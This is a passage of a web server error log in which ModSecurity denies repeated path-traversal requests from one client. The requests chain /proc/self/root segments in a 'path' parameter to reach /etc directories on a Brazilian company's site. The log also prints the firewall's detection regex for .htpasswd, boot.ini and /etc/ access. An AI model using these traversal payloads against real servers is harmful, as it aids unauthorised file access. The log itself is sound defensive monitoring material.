"ab1n39a6ubjKNq_cu4YXYAAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:37.069471 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:38018] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n4eoXxyEfFpUF8f-5oQAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:38.437814 2026] [:error] [pid 10189:tid 140411658000128] [client 74.7.241.31:41526] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n4jJ3M9BSuKP7CAZkJAAAAIo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:39.779155 2026] [:error] [pid 21219:tid 140411590858496] [client 74.7.241.31:41532] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n4_XLqtnMIWvjpaLXGAAAApI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:39.835863 2026] [:error] [pid 10189:tid 140411574073088] [client 74.7.228.61:33234] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "ab1n4zJ3M9BSuKP7CAZkJgAAAJQ"]
[Fri Mar 20 12:29:41.064185 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.241.31:41536] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n5da6ubjKNq_cu4YXawAAA0M"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:42.427755 2026] [:error] [pid 31215:tid 140411683178240] [client 74.7.241.31:41542] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n5gF0L0L-SsrnPo6hxwAAAsc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:43.902895 2026] [:error] [pid 21219:tid 140411540502272] [client 74.7.241.31:41544] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n5_XLqtnMIWvjpaLXIAAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:45.189322 2026] [:error] [pid 31215:tid 140411666392832] [client 74.7.241.31:41556] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n6QF0L0L-SsrnPo6hyQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:46.513913 2026] [:error] [pid 15826:tid 140411540502272] [client 74.7.241.31:41564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/kernel"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n6uoXxyEfFpUF8f-5owAAAVg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:49.104739 2026] [:error] [pid 31215:tid 140411582465792] [client 74.7.241.31:59516] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n6wF0L0L-SsrnPo6hygAAAtM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:54.103486 2026] [:error] [pid 10189:tid 140411616036608] [client 74.7.241.31:59530] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/default"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n8DJ3M9BSuKP7CAZkOgAAAI8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:55.602961 2026] [:error] [pid 7235:tid 140411658000128] [client 74.7.241.31:59538] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n8_qxLDW4GITHUkQlCwAAAQo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:56.932346 2026] [:error] [pid 21219:tid 140411574073088] [client 74.7.241.31:59554] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n9PXLqtnMIWvjpaLXIwAAApQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:58.226040 2026] [:error] [pid 31215:tid 140411548894976] [client 74.7.241.31:49552] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/uwsgi.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n9gF0L0L-SsrnPo6h0AAAAtc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:29:59.547771 2026] [:error] [pid 21219:tid 140411582465792] [client 74.7.241.31:49564] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n9_XLqtnMIWvjpaLXJAAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:06.455470 2026] [:error] [pid 9818:tid 140411624429312] [client 74.7.241.31:49574] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1n_l1pVZ5mVmJwsFNoCwAAAE4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:13.087799 2026] [:error] [pid 21219:tid 140411691570944] [client 74.7.241.31:35982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oBfXLqtnMIWvjpaLXLQAAAoY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:14.375796 2026] [:error] [pid 21219:tid 140411658000128] [client 74.7.241.31:35992] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oBvXLqtnMIWvjpaLXLgAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:15.706326 2026] [:error] [pid 15826:tid 140411708356352] [client 74.7.241.31:35996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/sysconfig"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oB-oXxyEfFpUF8f-5tgAAAUQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:17.010317 2026] [:error] [pid 7235:tid 140411683178240] [client 74.7.241.31:36006] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oCfqxLDW4GITHUkQlGAAAAQc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:25.827240 2026] [:error] [pid 9818:tid 140411699963648] [client 74.7.241.31:55404] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/yum.repos.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oEV1pVZ5mVmJwsFNoGgAAAEU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:27.235408 2026] [:error] [pid 11642:tid 140411691570944] [client 74.7.241.31:55416] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oE7ninkcc-iUj5AqVCgAAA4Y"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Fri Mar 20 12:30:29.599666 2026] [:error] [pid 7235:tid 140411607643904] [client 74.7.241.31:36218] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "ab1oFfqxLDW4GITHUkQlHgAAARA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
